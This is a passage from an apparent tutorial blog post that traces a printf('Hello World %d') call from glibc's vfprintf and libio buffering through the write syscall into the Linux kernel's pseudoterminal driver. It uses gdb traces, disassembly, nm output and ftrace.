Key point: A compiler/library is free to handle logic any way it wants between interfaces. After printf is called, there is no standard defined procedure required, except that the correct output is produced and within certain boundaries. There are many possible paths to the output, and every toolchain handles it differently. In general, this work is done in two parts: A platform-independent side where a call to printf solves the format substitution problem (Step-6, Step 7). The other is a platform-dependent side, which calls in to the OS kernel using the properly-formatted string (Step 8).

The next three steps will focus solely on the static-linked version of printf. It’s less tedious to trace static-linked source, especially through the kernel in the next few steps. Note that the number of instructions executed between both are ~2300 for dynamic and ~1600 for static.

In addition to printf, compliant C compilers also implement:

fprintf() — A generalized version of printf except the output can go to any file stream, not just the console. fprintf is notable the C standard defines supported format types in its description. fprintf() isn’t used, but it’s good to know about since it’s related to the next function

vfprintf() — Similar to fprintf except the variadic arguments are reduced to a single pointer to a va_list. libc does almost all printing work in this function, including format replacement. (f)printf merely calls vfprintf almost immediately. vfprintf then uses the libio interface to write final strings to streams.

These high-level print functions obey buffering rules defined on the stream descriptor. The output string is constructed in the buffer using internal GCC (libio) functions. Finally, write is the final step before handing work to the kernel. If you aren’t familiar with how these work, I recommend reading about the GCC wayof managing I/O

Bonus: Some extra reading about buffering with nice diagrams

Let’s trace our path through the standard library

printf() execution sequence …printf execution continued
$ gdb ./printf1_s … main at printf1.c:5 5 printf(«Hello World %d\n», 1); 0x400e02 5 printf(«Hello World %d\n», 1); 0x401d30 in printf () 0x414600 in vfprintf () 0x40c110 in strchrnul () 0x414692 in vfprintf () 0x423c10 in _IO_new_file_xsputn () 0x424ba0 in _IO_new_file_overflow () 0x425ce0 in _IO_doallocbuf () 0x4614f0 in _IO_file_doallocate () 0x4235d0 in _IO_file_stat () 0x40f8b0 in _fxstat ()   ### fstat syscall 0x461515 in _IO_file_doallocate () 0x410690 in mmap64 ()   ### mmap syscall 0x46155e in _IO_file_doallocate () 0x425c70 in _IO_setb () 0x461578 in _IO_file_doallocate () 0x425d15 in _IO_doallocbuf () 0x424d38 in _IO_new_file_overflow () 0x4243c0 in _IO_new_do_write () 0x423cc1 in _IO_new_file_xsputn () 0x425dc0 in _IO_default_xsputn () …cut 11 repeats of last 2 functions… 0x425e7c in _IO_default_xsputn () 0x423d02 in _IO_new_file_xsputn () 0x41475e in vfprintf () 0x414360 in _itoa_word () 0x4152bb in vfprintf () 0x423c10 in _IO_new_file_xsputn () 0x40b840 in mempcpy () 0x423c6d in _IO_new_file_xsputn () 0x41501f in vfprintf () 0x40c110 in strchrnul () 0x414d1e in vfprintf () 0x423c10 in _IO_new_file_xsputn () 0x40b840 in mempcpy () 0x423c6d in _IO_new_file_xsputn () 0x424ba0 in _IO_new_file_overflow () 0x4243c0 in _IO_new_do_write () 0x4235e0 in _IO_new_file_write () 0x40f9c7 in write () 0x40f9c9 in __write_nocancel ()   ### write syscall happens here 0x423623 in _IO_new_file_write () 0x42443c in _IO_new_do_write () 0x423cc1 in _IO_new_file_xsputn () 0x414d3b in vfprintf () 0x408450 in free () 0x41478b in vfprintf () 0x408450 in free () 0x414793 in vfprintf () 0x401dc6 in printf () main at printf1.c:6

This call trace shows the entire execution for this printf example. If you stare closely at this code trace, we can follow this basic logic:

  • printf passes string and formats to vfprintf
  • vfprintf starts to parse and attempts its first buffered write
  • Oops — buffer needs to be allocated. Let’s find some memory
  • vfprintf back to parsing…
  • Copy some results to a final location
  • We’re done — call write()
  • Clean up this mess

Let’s look at some of the functions:

_IO_*These functions are part of GCC’s libio module, which manage the internal stream buffer. Just looking at the names, we can guess that there is a lot of writing and memory allocation. The source code for most of these operations is in the files fileops.c and genops.c.

_fxstat pulls the state of file descriptors. Since this is system dependent, it’s located at /sysdeps/unix/sysv/linux/fxstat64.c.

The remaining functions are covered in detail in the next two steps.

Let’s dig more!

Step 7 — Format string resolved

Goal: Solve the format problem

Let’s think about our input string, Hello World %d\n. There are three distinct sections that need to be processed as we scan across is from left to right.

  • 'Hello World ' — simple put
  • %d — substitute the integer literal ‘1’
  • \n — simple put

Now referring back to our trace, we can find three code sections that suggest where to look for the formatting work:

0x400e02 5  printf("Hello World %d\n", 1);
0x401d30 in printf ()
0x414600 in vfprintf ()
0x40c110 in strchrnul ()           # string scanning
0x414692 in vfprintf ()
0x423c10 in _IO_new_file_xsputn () # buffering 'Hello World '
0x41475e in vfprintf ()
0x414360 in _itoa_word ()          # converting integer
0x4152bb in vfprintf ()
0x423c10 in _IO_new_file_xsputn () # buffering '1'
0x41501f in vfprintf ()
0x40c110 in strchrnul ()           # string scanning
0x414d1e in vfprintf ()
0x423c10 in _IO_new_file_xsputn () # buffering '\n'

A few function calls after that final vfprintf() call is the hand off to the kernel. The formatting must have happened in vfprintf between the instructions indicated above. All substitutions handed pointers to the finished string to libio for line buffering. Let’s take a peek at the first round only:

The hand off to xsputn requires vfprintf to identify the start location in the string and a size. The start is already known (current position), but it’s up to strchrnul() to find a pointer to the start of the next ‘%’ or the end of string. We can follow the parsing rules in GCC source code (/stdio-common/printf-*).

from glibc/stdio-common/printf-parse.h:

/* Find the next spec in FORMAT, or the end of the string.  Returns
   a pointer into FORMAT, to a '%' or a '\0'.  */
__extern_always_inline const unsigned char *
__find_specmb (const unsigned char *format)
  return (const unsigned char *) __strchrnul ((const char *) format, '%');

Or we can look in the compiled binary (my preferred timesink):

in vfprintf:
  0x414668 <+104>: mov    esi,0x25   # Setting ESI to the '%' symbol
  0x41466d <+109>: mov    rdi,r12    # Pointing RDI to the format string
  ...saving arguments...
  0x41468d <+141>: call   0x40c110 <strchrnul> # Search for next % or end

in strchrnul:
  0x40c110 <+0>: movd   xmm1,esi   # Loading up an SSE register with '%'
  0x40c114 <+4>: mov    rcx,rdi    # Moving the format string pointer
  0x40c117 <+7>: punpcklbw xmm1,xmm1 # Vector-izing '%' for a fast compare
  ...eventual return of a pointer to the next token...

Long story short, we’ve located where formats are found and processed.

That’s going to be the limit of peeking at source code for glibc. I don’t want this article to become an ugly mess. In any case, the buffer is ready to go after all three format processing steps.

Step 8 — Final string written to standard output

Goal: Follow events leading up to the kernel syscall

The formatted string, «Hello World 1», now lives in a buffer as part of the stdout file stream. stdout to a console is usually line buffered, but exceptions do exist. All cases for console stdout eventually lead to the ‘write’ syscall, which is prototyped for the particular system. UNIX(-like) systems conform to the POSIX standard, if only unofficially. POSIX defines the write syscall:

ssize_t write(int fildes, const void *buf, size_t nbyte);

From the trace in step 6, recall that the functions leading up to the syscall are:

0x4235e0 in _IO_new_file_write ()  # libio/fileops.c
0x40f9c7 in write ()               # sysdeps/unix/sysv/linux/write.c
0x40f9c9 in __write_nocancel ()    # various macros in libc and linux
  ### write syscall happens here

The link between the compiler and operating system is the ABI, and is architecture dependent. That’s why we see a jump from libc’s libio code to our test case architecture code under (gcc)/sysdeps. When your standard library and OS is compiled for your system, these links are resolved and only the applicable ABI remains. The resulting write call is best understood by looking at the object code in our program (printf1_s).

First, let’s tackle one of the common complaints from beginners reading glibc source code…the 1000 difference ways write() appears. At the binary level, this problem goes away after static-linking. In our case, write() == __write() == __libc_write()

$ nm printf1_s | grep write
6b8b20 D _dl_load_write_lock
41f070 W fwrite
400575 t _i18n_number_rewrite
40077f t _i18n_number_rewrite
427020 T _IO_default_write
4243c0 W _IO_do_write
4235e0 W _IO_file_write
41f070 T _IO_fwrite
4243c0 T _IO_new_do_write
4235e0 T _IO_new_file_write
421c30 T _IO_wdo_write
40f9c0 T __libc_write     ## Real write in symbol table
43b220 T __libc_writev
40f9c0 W write            ## Same address -- weak symbol
40f9c0 W __write          ## Same address -- weak symbol
40f9c9 T __write_nocancel
43b220 W writev
43b220 T __writev

So any reference to these symbols actually jumps to the same executable code. For what it’s worth, writev() == __writev(), and fwrite() == _IO_fwrite

And what does __libc_write look like…?

000000000040f9c0 <__libc_write>:
  40f9c0:  83 3d c5 bb 2a 00 00   cmpl   $0x0,0x2abbc5(%rip)  # 6bb58c <__libc_multiple_threads>
  40f9c7:  75 14                  jne    40f9dd <__write_nocancel+0x14>

000000000040f9c9 <__write_nocancel>:
  40f9c9:	b8 01 00 00 00       	mov    $0x1,%eax
  40f9ce:	0f 05                	syscall 

Write simply checks the threading state and, assuming all is well, moves the write syscall number (1) in to EAX and enters the kernel.

Some notes:

  • x86-64 Linux write syscall is 1, old x86 was 4
  • rdi refers to stdout
  • rsi points to the string
  • rdx is the string size count

Step 9 — Driver writes output string

Goal: Show the execution steps from syscall to driver

Now we’re in the kernel with rdi, rsi, and rdx holding the call parameters. Console behavior in the kernel depends on your current environment. Two opposing cases are if you’re printing to native console/CLI or in a desktop pseudoterminal, such as GNOME Terminal.

I tested both types of terminals on my system and I’ll walk through the desktop pseudoterminal case. Counter-intuitively, the desktop environment is easier to explain despite the extra layers of work. The PTY is also much faster — the process has exclusive use of the pty where as many processes are aware of (and contend for) the native console.

We need to track code execution within the kernel, so let’s give Ftrace a shot. We’ll start by making a short script that activates tracing, runs our program, and deactivates tracing. Although execution only lasts for a few milliseconds, that’s long enough to produce tens or hundreds of thousands of lines of kernel activity.

echo function_graph > /sys/kernel/debug/tracing/current_tracer
echo 1 > /sys/kernel/debug/tracing/tracing_on
echo 0 > /sys/kernel/debug/tracing/tracing_on
cat /sys/kernel/debug/tracing/trace > output

Here is what happens after our static-linked printf executes the write syscall in a GNOME Terminal:

7)           | SyS_write() {
7)           |  vfs_write() {
7)           |   tty_write() {
7) 0.053 us  |    tty_paranoia_check();
7)           |    n_tty_write() {
7) 0.091 us  |     process_echoes();
7)           |     add_wait_queue()
7) 0.026 us  |     tty_hung_up_p();
7)           |     tty_write_room()
7)           |     pty_write() {
7)           |      tty_insert_flip_string_fixed_flag()
7)           |      tty_flip_buffer_push() {
7)           |       queue_work_on()
7)+10.288 us |      } /* tty_flip_buffer_push */
7)           |      tty_wakeup() 
7)+14.687 us |     } /* pty_write */
7)+57.252 us |    } /* n_tty_write */
7)+61.647 us |   } /* tty_write */
7)+64.106 us |  } /* vfs_write */
7)+64.611 us | } /* SyS_write */

This output has been culled to fit this screen. Over 1000 lines of kernel activity were cut within SyS_write, most of which were locks and the kernel scheduler. The total time spent in kernel is 65 microseconds. This is in stark contrast to the native terminal, which took over 6800 microseconds!

Now is a good time to step back and think about how pseudoterminals are implemented. As I was researching a good way to explain it, I happened upon an excellent write up by Linus Åkesson. He explains far better than I could. This diagram he drew up fits our case perfectly.

The TL;DR version is that pseudoterminals have a master and a slave side. A TTY driver provides the slave functionality while the master side is controlled by a terminal process.

Let’s demonstrate that on my system. Recall that I’m testing through a gnome-terminal window.

$ ./printf1_s
Hello World 1
[1]+  Stopped                 ./printf1_s
$ top -o TTY
printf tty/pts usage

bash is our terminal parent process using pts/0. The shell forked (cloned) top and printf. Both inherited the bash stdin and stdout.

Let’s take a closer look at the pts/0 device the kernel associates with our printf1_s process.

$ ls -l /dev/pts/0
crw--w----. 1 maizure tty 136, 0 Apr  1 09:55 /dev/pts/0

Notice that the pseudoterminal itself is associated with a regular tty device. It also has a major number 136. What’s that?

From this linux kernel version sourceinclude/uapi/linux/major.h


Yes, this major number is associated with a pseudoterminal slave (Master = 128, Slave = 128 + 8 = 136). A tty driver is responsible for its operation. If we revisit our write syscall trace, this makes sense:

...cut from earlier
7)           |  pty_write() {
7)           |      tty_insert_flip_string_fixed_flag()
7)           |      tty_flip_buffer_push() {
7)           |          queue_work_on()
7)+10.288 us |      }
7)           |      tty_wakeup() 
7)+14.687 us |  } /* pty_write */

The pty_write() function invokes tty_* operations, which we assume moves ‘Hello World 1’ to the console. So where is this console?

Step 10 — Console output buffer is updated

Goal: Put the string to the console attached to stdout

The first argument to pty_write is struct tty_struct *ttyThis struct contains the console, which is created with each unique tty process. In this case, the parent terminal created the pts/0 console and each child simply points to it.

The tty has many interesting parts to look at: line discipline, driver operations, the tty buffer(s), the tty_port. In the interest of space, I’m not going to cover tty initialization since it’s not on the direct path for printf — the process was created, the tty exists, and it wants this ‘Hello World 1’ right now!

The string is copied to the input queue in tty_insert_flip_string_fixed_flag().

memcpy(tb->char_buf_ptr + tb->used, chars, space); 
memset(tb->flag_buf_ptr + tb->used, flag, space);
tb->used += space;
copied += space;
chars += space;

This moves the data and flags to the current flip buffer. The console state is updated and the buffer is pushed:

if (port->low_latency)

Then the line discipline is notified to add the new string to the output window in tty_wakeup(). The typical case involves a kernel work queue, which is necessarily asynchronous. The string is waiting in the buffer with the signal to go. Now it’s up to the PT master to process it.

Our master is the gnome_temrinal, which manages the window context we see on screen. The buffer will eventually stream to the console on the kernel’s schedule. In a native console (not X server), this would be a segment of raw video memory. Once the pty master processes the new data…

Step 11 — Hello world!

Goal: Rejoice

$ ./printf1_s
Hello World 1


Now you know how it works on my system. How about yours?


Why did you put this article together?
Recently, I was asked about how some functions are implemented several times over a short period and I couldn’t find a satisfactory resource to point to. Many blog posts focused too much on digging through byzantine compiler source code. I found that approach unhelpful because the compiler and standard library are only one part of the problem. This system-wide approach gives beginners a foundation, a path to follow, and helpful experiments to adapt to their own use.

What did you leave out?
Too much! It’ll have to wait until ‘printf() in 2500 seconds’. In no particular order:

  • Details about how glibc implements buffering
  • Details of how the GNOME console manages the terminal context
  • Flip buffer mechanics for ttys (similar to video backbuffers)
  • More about Linux work queues used in the tty driver
  • More discussion of how this process varies among architectures
  • Last (and definitely least): Untangling the mess inside vfprintf

How did you get gdb to print out that trace in step 6?
I used a separate file for automating gdb input and captured the output to another file.

$cat gdbcmds
...about 1000 more stepi...

$gdb printf1_s -x gdbcmds > printf1_s_dump